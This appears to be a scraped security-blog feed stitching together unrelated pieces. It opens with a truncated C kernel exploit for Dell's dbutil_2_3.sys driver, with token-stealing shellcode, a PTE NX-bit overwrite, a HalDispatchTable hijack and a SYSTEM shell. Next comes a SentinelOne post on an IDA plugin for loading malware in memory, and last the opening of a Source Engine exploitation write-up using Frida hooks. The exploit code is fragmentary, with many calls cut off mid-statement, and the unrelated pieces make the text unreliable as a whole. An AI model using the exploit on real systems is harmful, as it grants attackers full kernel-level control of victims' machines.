		printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());

	// Defining number of drivers for GetDeviceDriverBaseNameA()
	drivers = lpcbNeeded / sizeof(lpImageBase[0]);

	// Parsing loaded drivers
	for (int i = 0; i < drivers; i++)
			sizeof(lpFileName) / sizeof(char)

		// Keep looping, until found, to find user supplied driver base address
		if (!strcmp(name, lpFileName))
			imageBase = (unsigned long long)lpImageBase[i];

			// Exit loop

	return imageBase;

void exploitWork(void)
	// Store the base of the kernel
	unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

	// Storing the base of the driver
	unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

	// Print updates
	printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
	printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

	// Store nt!MiGetPteAddress+0x13
	unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

	// Obtain a handle to the driver
	HANDLE driverHandle = CreateFileA(

	// Error handling
	if (driverHandle == INVALID_HANDLE_VALUE)
		printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
		printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

		// Buffer to send to the driver (read primitive)
		unsigned long long inBuf1[4];

		// Values to send
		unsigned long long one1 = 0x4141414141414141;
		unsigned long long two1 = ntmigetpteAddress;
		unsigned long long three1 = 0x0000000000000000;
		unsigned long long four1 = 0x0000000000000000;

		// Assign the values
		inBuf1[0] = one1;
		inBuf1[1] = two1;
		inBuf1[2] = three1;
		inBuf1[3] = four1;

		// Interact with the driver
		DWORD bytesReturned1 = 0;

		BOOL interact = DeviceIoControl(

		// Error handling
		if (!interact)
			printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
			// Last member of read array should contain base of the PTEs
			unsigned long long pteBase = inBuf1[3];

			printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

			// .data section of dbutil_2_3.sys contains a code cave
			unsigned long long shellcodeLocation = driverBase + 0x3010;

			// Bitwise operations to locate PTE of shellcode page
			unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
			shellcodePte = shellcodePte & 0x7FFFFFFFF8;
			shellcodePte = shellcodePte + pteBase;

			// Print update
			printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

			// Buffer to send to the driver (read primitive)
			unsigned long long inBuf2[4];

			// Values to send
			unsigned long long one2 = 0x4141414141414141;
			unsigned long long two2 = shellcodePte;
			unsigned long long three2 = 0x0000000000000000;
			unsigned long long four2 = 0x0000000000000000;

			inBuf2[0] = one2;
			inBuf2[1] = two2;
			inBuf2[2] = three2;
			inBuf2[3] = four2;

			// Parameter for DeviceIoControl
			DWORD bytesReturned2 = 0;

			BOOL interact1 = DeviceIoControl(

			// Error handling
			if (!interact1)
				printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
				// Last member of read array should contain PTE bits
				unsigned long long pteBits = inBuf2[3];

				printf("[+] PTE bits for the shellcode page: %p\n", pteBits);

					; Windows 10 1903 x64 Token Stealing Payload
					; Author Connor McGarr

					[BITS 64]

						mov rax, [gs:0x188]		  ; Current thread (_KTHREAD)
						mov rax, [rax + 0xb8]	  ; Current process (_EPROCESS)
						mov rbx, rax			  ; Copy current process (_EPROCESS) to rbx
						mov rbx, [rbx + 0x2f0] 	  ; ActiveProcessLinks
						sub rbx, 0x2f0		   	  ; Go back to current process (_EPROCESS)
						mov rcx, [rbx + 0x2e8] 	  ; UniqueProcessId (PID)
						cmp rcx, 4 				  ; Compare PID to SYSTEM PID
						jnz __loop			      ; Loop until SYSTEM PID is found

						mov rcx, [rbx + 0x360]	  ; SYSTEM token is @ offset _EPROCESS + 0x360
						and cl, 0xf0			  ; Clear out _EX_FAST_REF RefCnt
						mov [rax + 0x360], rcx	  ; Copy SYSTEM token to current process

						xor rax, rax			  ; set NTSTATUS STATUS_SUCCESS
						ret						  ; Done!


				// One QWORD arbitrary write
				// Shellcode is 67 bytes, rounded up to 9 unsigned long longs (72 bytes)
				unsigned long long shellcode1 = 0x00018825048B4865;
				unsigned long long shellcode2 = 0x000000B8808B4800;
				unsigned long long shellcode3 = 0x02F09B8B48C38948;
				unsigned long long shellcode4 = 0x0002F0EB81480000;
				unsigned long long shellcode5 = 0x000002E88B8B4800;
				unsigned long long shellcode6 = 0x8B48E57504F98348;
				unsigned long long shellcode7 = 0xF0E180000003608B;
				unsigned long long shellcode8 = 0x4800000360888948;
				unsigned long long shellcode9 = 0x0000000000C3C031;

				// Buffers to send to the driver (write primitive)
				unsigned long long inBuf3[4];
				unsigned long long inBuf4[4];
				unsigned long long inBuf5[4];
				unsigned long long inBuf6[4];
				unsigned long long inBuf7[4];
				unsigned long long inBuf8[4];
				unsigned long long inBuf9[4];
				unsigned long long inBuf10[4];
				unsigned long long inBuf11[4];

				// Values to send
				unsigned long long one3 = 0x4141414141414141;
				unsigned long long two3 = shellcodeLocation;
				unsigned long long three3 = 0x0000000000000000;
				unsigned long long four3 = shellcode1;

				unsigned long long one4 = 0x4141414141414141;
				unsigned long long two4 = shellcodeLocation + 0x8;
				unsigned long long three4 = 0x0000000000000000;
				unsigned long long four4 = shellcode2;

				unsigned long long one5 = 0x4141414141414141;
				unsigned long long two5 = shellcodeLocation + 0x10;
				unsigned long long three5 = 0x0000000000000000;
				unsigned long long four5 = shellcode3;

				unsigned long long one6 = 0x4141414141414141;
				unsigned long long two6 = shellcodeLocation + 0x18;
				unsigned long long three6 = 0x0000000000000000;
				unsigned long long four6 = shellcode4;

				unsigned long long one7 = 0x4141414141414141;
				unsigned long long two7 = shellcodeLocation + 0x20;
				unsigned long long three7 = 0x0000000000000000;
				unsigned long long four7 = shellcode5;

				unsigned long long one8 = 0x4141414141414141;
				unsigned long long two8 = shellcodeLocation + 0x28;
				unsigned long long three8 = 0x0000000000000000;
				unsigned long long four8 = shellcode6;

				unsigned long long one9 = 0x4141414141414141;
				unsigned long long two9 = shellcodeLocation + 0x30;
				unsigned long long three9 = 0x0000000000000000;
				unsigned long long four9 = shellcode7;

				unsigned long long one10 = 0x4141414141414141;
				unsigned long long two10 = shellcodeLocation + 0x38;
				unsigned long long three10 = 0x0000000000000000;
				unsigned long long four10 = shellcode8;

				unsigned long long one11 = 0x4141414141414141;
				unsigned long long two11 = shellcodeLocation + 0x40;
				unsigned long long three11 = 0x0000000000000000;
				unsigned long long four11 = shellcode9;

				inBuf3[0] = one3;
				inBuf3[1] = two3;
				inBuf3[2] = three3;
				inBuf3[3] = four3;

				inBuf4[0] = one4;
				inBuf4[1] = two4;
				inBuf4[2] = three4;
				inBuf4[3] = four4;

				inBuf5[0] = one5;
				inBuf5[1] = two5;
				inBuf5[2] = three5;
				inBuf5[3] = four5;

				inBuf6[0] = one6;
				inBuf6[1] = two6;
				inBuf6[2] = three6;
				inBuf6[3] = four6;

				inBuf7[0] = one7;
				inBuf7[1] = two7;
				inBuf7[2] = three7;
				inBuf7[3] = four7;

				inBuf8[0] = one8;
				inBuf8[1] = two8;
				inBuf8[2] = three8;
				inBuf8[3] = four8;

				inBuf9[0] = one9;
				inBuf9[1] = two9;
				inBuf9[2] = three9;
				inBuf9[3] = four9;

				inBuf10[0] = one10;
				inBuf10[1] = two10;
				inBuf10[2] = three10;
				inBuf10[3] = four10;

				inBuf11[0] = one11;
				inBuf11[1] = two11;
				inBuf11[2] = three11;
				inBuf11[3] = four11;

				DWORD bytesReturned3 = 0;
				DWORD bytesReturned4 = 0;
				DWORD bytesReturned5 = 0;
				DWORD bytesReturned6 = 0;
				DWORD bytesReturned7 = 0;
				DWORD bytesReturned8 = 0;
				DWORD bytesReturned9 = 0;
				DWORD bytesReturned10 = 0;
				DWORD bytesReturned11 = 0;

				BOOL interact2 = DeviceIoControl(

				BOOL interact3 = DeviceIoControl(

				BOOL interact4 = DeviceIoControl(

				BOOL interact5 = DeviceIoControl(

				BOOL interact6 = DeviceIoControl(

				BOOL interact7 = DeviceIoControl(

				BOOL interact8 = DeviceIoControl(

				BOOL interact9 = DeviceIoControl(

				BOOL interact10 = DeviceIoControl(

				// A lot of error handling
				if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
					printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
					printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

					// Clear the no-eXecute bit
					unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

					printf("[+] Corrupted PTE bits for the shellcode page: %p\n", taintedPte);

					// Clear the no-eXecute bit in the actual PTE
					// Buffer to send to the driver (write primitive)
					unsigned long long inBuf13[4];

					// Values to send
					unsigned long long one13 = 0x4141414141414141;
					unsigned long long two13 = shellcodePte;
					unsigned long long three13 = 0x0000000000000000;
					unsigned long long four13 = taintedPte;

					// Assign the values
					inBuf13[0] = one13;
					inBuf13[1] = two13;
					inBuf13[2] = three13;
					inBuf13[3] = four13;

					// Interact with the driver
					DWORD bytesReturned13 = 0;

					BOOL interact12 = DeviceIoControl(

					// Error handling
					if (!interact12)
						printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
						printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

						// Offset to nt!HalDispatchTable+0x8
						unsigned long long halDispatch = baseofKernel + 0x427258;

						// Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
						// Buffer to send to the driver (read primitive)
						unsigned long long inBuf14[4];

						// Values to send
						unsigned long long one14 = 0x4141414141414141;
						unsigned long long two14 = halDispatch;
						unsigned long long three14 = 0x0000000000000000;
						unsigned long long four14 = 0x0000000000000000;

						// Assign the values
						inBuf14[0] = one14;
						inBuf14[1] = two14;
						inBuf14[2] = three14;
						inBuf14[3] = four14;

						// Interact with the driver
						DWORD bytesReturned14 = 0;

						BOOL interact13 = DeviceIoControl(

						// Error handling
						if (!interact13)
							printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
							// Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
							unsigned long long preservedHal = inBuf14[3];

							printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

							// Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
							// Buffer to send to the driver (write primitive)
							unsigned long long inBuf15[4];

							// Values to send
							unsigned long long one15 = 0x4141414141414141;
							unsigned long long two15 = halDispatch;
							unsigned long long three15 = 0x0000000000000000;
							unsigned long long four15 = shellcodeLocation;

							// Assign the values
							inBuf15[0] = one15;
							inBuf15[1] = two15;
							inBuf15[2] = three15;
							inBuf15[3] = four15;

							// Interact with the driver
							DWORD bytesReturned15 = 0;

							BOOL interact14 = DeviceIoControl(

							// Error handling
							if (!interact14)
								printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
								printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

								// Locating nt!NtQueryIntervalProfile
								NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(

								// Error handling
								if (!NtQueryIntervalProfile)
									printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
									// Print update for found ntdll!NtQueryIntervalProfile
									printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

									// Calling nt!NtQueryIntervalProfile
									ULONG exploit = 0;


									// Restoring nt!HalDispatchTable+0x8
									// Buffer to send to the driver (write primitive)
									unsigned long long inBuf16[4];

									// Values to send
									unsigned long long one16 = 0x4141414141414141;
									unsigned long long two16 = halDispatch;
									unsigned long long three16 = 0x0000000000000000;
									unsigned long long four16 = preservedHal;

									// Assign the values
									inBuf16[0] = one16;
									inBuf16[1] = two16;
									inBuf16[2] = three16;
									inBuf16[3] = four16;

									// Interact with the driver
									DWORD bytesReturned16 = 0;

									BOOL interact15 = DeviceIoControl(

									// Error handling
									if (!interact15)
										printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
										printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
										printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

										// Spawning an NT AUTHORITY\SYSTEM shell
										system("cmd.exe /c cmd.exe /K cd C:\\");

// Call exploitWork()
void main(void)

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

25 March 2021 at 11:26

Recent events have highlighted the fact that security researchers are high-value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed such that downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. First, if the researcher is actively investigating a sample and the AV throws a static detection, this can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you just might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in the graph in red, making them easier to spot. A plugin runs after the IDA database is initialized, meaning a binary has already been loaded into the database. A loader, by contrast, is what loads a binary into the IDA database in the first place.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to further extend IDA Pro’s loading capability, so that it can load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL in which the memory loading capabilities are implemented. Its main functionality is to take a buffer of bytes from memory and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to the disk. The loader accepts zip format files (.zip). After accepting a zip file, it will display the files inside the archive and allow you to choose the one you want to work with.

MemZipLoader will extract the chosen file from the input ZIP into a memory buffer and load it into IDA without writing it to disk, so only the (possibly encrypted) zip file is stored on your drive.
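MemZipLoader’s source isn’t reproduced in this post, so the following is only a hypothetical C sketch of the first step such a loader needs. It walks the ZIP local file headers of an archive that is already in memory and reports each entry’s name, compressed size and encryption flag. It follows the standard ZIP local-header layout, but it does not decompress or decrypt anything. It also gives up on entries that keep their sizes in a trailing data descriptor; a real loader would more likely read the central directory instead.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Little-endian readers that work regardless of host byte order. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

typedef struct {
    char name[256];          /* entry name (truncated if longer) */
    uint32_t comp_size;      /* compressed size in bytes */
    bool encrypted;          /* general-purpose flag bit 0 */
    const uint8_t *data;     /* points into the caller's buffer; nothing touches disk */
} zip_entry_t;

/* Walk local file headers ("PK\3\4") in an in-memory ZIP. Returns the number of
 * entries found (at most max), stopping at the first malformed or unsupported one. */
static size_t zip_list_entries(const uint8_t *buf, size_t len, zip_entry_t *out, size_t max) {
    size_t off = 0, n = 0;
    while (n < max && len - off >= 30 && rd32(buf + off) == 0x04034b50u) {
        uint16_t flags = rd16(buf + off + 6);
        uint32_t csize = rd32(buf + off + 18);
        uint16_t nlen  = rd16(buf + off + 26);
        uint16_t xlen  = rd16(buf + off + 28);
        if (flags & 0x0008)
            break;                                   /* sizes live in a data descriptor */
        size_t hdr = 30 + (size_t)nlen + xlen;
        if (hdr > len - off || csize > len - off - hdr)
            break;                                   /* truncated archive */
        size_t copy = nlen < sizeof out[n].name ? nlen : sizeof out[n].name - 1;
        memcpy(out[n].name, buf + off + 30, copy);
        out[n].name[copy] = '\0';
        out[n].comp_size = csize;
        out[n].encrypted = (flags & 0x0001) != 0;
        out[n].data = buf + off + hdr;
        n++;
        off += hdr + csize;                          /* skip to the next header */
    }
    return n;
}
```

The returned data pointers can then be handed to a decompressor (and, for encrypted entries, a decryptor) without ever creating a file.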

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is always suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the file downloaded will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

  1. Download zip with binaries from here.
  2. Extract the zip files to a folder.
  3. Place the memory loader DLLs in the IDA directory folder.
      1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
      2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)
  4. Place the loaders in the loaders directory of IDA.
      1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
      2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
      3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
      4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:


MemZipLoader:

  1. Open IDA and choose a zip file.
  2. IDA should automatically suggest the loader.
  3. Once selected, a list of the files from the zip will be displayed.
  4. IDA will then use the loader code and load the chosen file as if the binary were a local file on the system.

UrlLoader:

  1. Open any file on your computer in a directory you have write privileges to.
  2. IDA will suggest UrlLoader as a loader for the file.
  3. After you choose UrlLoader, you will be asked to enter a URL.
  4. The loader will fetch the file from the network location you entered. IDA Pro will then use the loader code and load the binary as if it were a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

    1. Open a DLL project in Visual Studio.
    2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is where the loader definition will be.
    3. accept_file – this function returns a boolean indicating whether the loader is relevant to the binary currently being loaded into IDA. For example, if you are loading a PE, the build_loaders_list should return PE.dll as one of the loading options.
    4. load_file – this function is responsible for loading a file into the database. Each loader implements it differently, so there is not much to say here. Documentation on loaders can be found here.
    5. The project can be compiled into two versions: 64-bit IDA with 64-bit addresses, and 64-bit IDA with 32-bit addresses. From this point forward we will mark them:
        1. X64 | X64 – 64 bit IDA with 64 BIT addresses
        2. X32 | X64 – 64 bit IDA with 32 BIT addresses


  • Target file name (Configuration Properties -> Target Name)
    1. X64 | X64 – $(ProjectName)64
    2. X32 | X64 – $(ProjectName)
  • Include header files (same for X64 | X64 and X32 | X64):
    1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA Pro SDK.
    2. Set Runtime Library -> Multi-threaded Debug (/MTd)
  • Include lib files:
    1. X64 | X64
      1. idasdk75\lib\x64_win_vc_64
    2. X32 | X64
      1. idasdk75\lib\x64_win_vc_32
      2. idasdk75\lib\x64_win_vc_64
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
    1. X64 | X64 add: __EA64__
    2. X32 | X64 add: __X64__, __NT__
  • Undefined Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
    1. X32 | X64: __EA64__
Conclusion

When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to the disk.

Using the Memory Loader plugin also saves you time analyzing binaries. When working with malicious content in IDA Pro, a separate environment, usually a virtual machine, is often created for it. Copying the binary and setting up the machine for research every time you want to open IDA is time-consuming. The Memory Loader plugin will allow you to work from your machine in a safer and more productive way.

Please note that an IDA Pro license is needed to use and develop extensions for IDA Pro.

The SentinelOne IDA Pro Memory Loader Plugin is available on GitHub.


The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida


Hey guys, it’s been a while. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs (one memory corruption and one infoleak) to achieve code execution, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, and L4D2 (no game-specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, and experimented with the Frida framework as a way to interface with the engine through TypeScript.

Problems with SourceMod (since the last post)

If you read my last blog post, you know that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it quickly became apparent that most of the obvious bugs in the original Source 2013 codebases were already patched. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was spent writing SourceMod scripts and testing. While SourceMod already has a pretty fleshed-out scripting environment, it still uses the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required compiling C++ plugins against its plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into (in this case hl2.exe) and injects the “server” (known as a Gadget), which talks back and forth with the “client”. The “server”, executing inside the game, creates a rich JavaScript environment with special bindings to read/write memory and hook code. To learn more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a TypeScript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that engine objects very often take advantage of C++ polymorphism, exposing their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual TypeScript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.
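To show what such a wrapper does underneath, here is a portable C sketch of calling a “virtual function” through a raw vtable pointer. It assumes the common MSVC single-inheritance layout, where the first pointer-sized field of a polymorphic object points to an array of function pointers. The fake object and its slots are hypothetical. Note also that 32-bit MSVC member functions use __thiscall (this passed in ECX), whereas this sketch passes self as an ordinary argument, so a real wrapper has to match the target’s calling convention.

```c
#include <stdint.h>

/* Signature shared by every slot in this toy vtable. */
typedef int (*virtual_fn_t)(void *self, int arg);

/* Assumed layout: the object's first field points to its vtable. */
typedef struct {
    const virtual_fn_t *vtable;
} object_header_t;

/* Call vtable slot `index` on an arbitrary object pointer, the way a
 * wrapper turns a raw native pointer into a method call. */
static int call_virtual(void *object, unsigned index, int arg) {
    const object_header_t *hdr = (const object_header_t *)object;
    return hdr->vtable[index](object, arg);
}

/* A hypothetical "class" with two virtual methods and one data member. */
typedef struct {
    object_header_t base;
    int value;
} fake_object_t;

static int fake_get(void *self, int arg) { (void)arg; return ((fake_object_t *)self)->value; }
static int fake_add(void *self, int arg) { return ((fake_object_t *)self)->value + arg; }

static const virtual_fn_t fake_vtable[] = { fake_get, fake_add };
```

In a wrapper library, each method of a class like CNetChan would simply be a named call_virtual with a fixed slot index.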

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the TypeScript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.
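Frida’s Interceptor patches the target function’s machine code in memory. The C sketch below is a much simpler stand-in that only swaps a function pointer (the kind of slot found in a vtable). It still shows the same onEnter/onLeave shape: a callback can inspect or modify the arguments before the original runs and the return value afterwards. All names are hypothetical, and only a single hook is supported for brevity.

```c
#include <stddef.h>

typedef int (*target_fn_t)(int a, int b);

/* Hypothetical hook record: callbacks that run around the original function. */
typedef struct {
    target_fn_t original;                 /* saved original pointer */
    void (*on_enter)(int *a, int *b);     /* may inspect or modify arguments */
    void (*on_leave)(int *retval);        /* may inspect or modify the return value */
} hook_t;

static hook_t g_hook;                      /* single global hook for simplicity */

/* Installed in place of the original; forwards to it between the callbacks. */
static int hook_trampoline(int a, int b) {
    if (g_hook.on_enter) g_hook.on_enter(&a, &b);
    int ret = g_hook.original(a, b);
    if (g_hook.on_leave) g_hook.on_leave(&ret);
    return ret;
}

/* Swap the pointer in *slot for the trampoline, remembering the original. */
static void hook_install(target_fn_t *slot, void (*on_enter)(int *, int *),
                         void (*on_leave)(int *)) {
    g_hook.original = *slot;
    g_hook.on_enter = on_enter;
    g_hook.on_leave = on_leave;
    *slot = hook_trampoline;
}

static void hook_remove(target_fn_t *slot) { *slot = g_hook.original; }

/* Example target and callbacks used to demonstrate the hook. */
static int add_ints(int a, int b) { return a + b; }
static int g_calls;
static void count_enter(int *a, int *b) { (void)a; (void)b; g_calls++; }
static void double_leave(int *ret) { *ret *= 2; }
```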

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. This let me assign names to functions inside my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their addresses. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll in the current process, hooks it, and then does some work with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
    }
})

Now, if the game updates, this script will still function as long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported between engine updates automagically using BinDiff, making it easy to port offsets as the game updates!
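I haven’t reproduced the ret-sync extension itself, but the core step any tool like it needs is rebasing. An address shown in IDA is relative to the image base the database was created with, while the module may be loaded at a different base in the live process. The live address is therefore the IDA address, minus the database’s image base, plus the module’s runtime base. Here is a minimal C sketch, with a hypothetical symbol table and made-up addresses:

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical symbol record exported from an IDA database:
 * a name and its address as shown in IDA. */
typedef struct {
    const char *name;
    uint64_t ida_address;
} ida_symbol_t;

/* Translate an IDA-database address into the live process:
 * runtime = ida_address - ida_image_base + runtime_base. */
static uint64_t rebase(uint64_t ida_address, uint64_t ida_image_base, uint64_t runtime_base) {
    return ida_address - ida_image_base + runtime_base;
}

/* Look up a symbol by name and rebase it; returns 0 if the name is unknown. */
static uint64_t resolve_symbol(const ida_symbol_t *syms, size_t count, const char *name,
                               uint64_t ida_image_base, uint64_t runtime_base) {
    for (size_t i = 0; i < count; i++) {
        if (strcmp(syms[i].name, name) == 0)
            return rebase(syms[i].ida_address, ida_image_base, runtime_base);
    }
    return 0;
}
```

Because only names cross the boundary, the script keeps working after an update as long as the symbol is still named in the database.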

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to come, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with pwntools and CTF backgrounds to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There are a lot of bugs in Source. It’s a very buggy engine. But not all bugs are created equal, and only some bugs are worth attempting to chain together. The easiest type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing as long as you have a silly string bug affecting the stack.

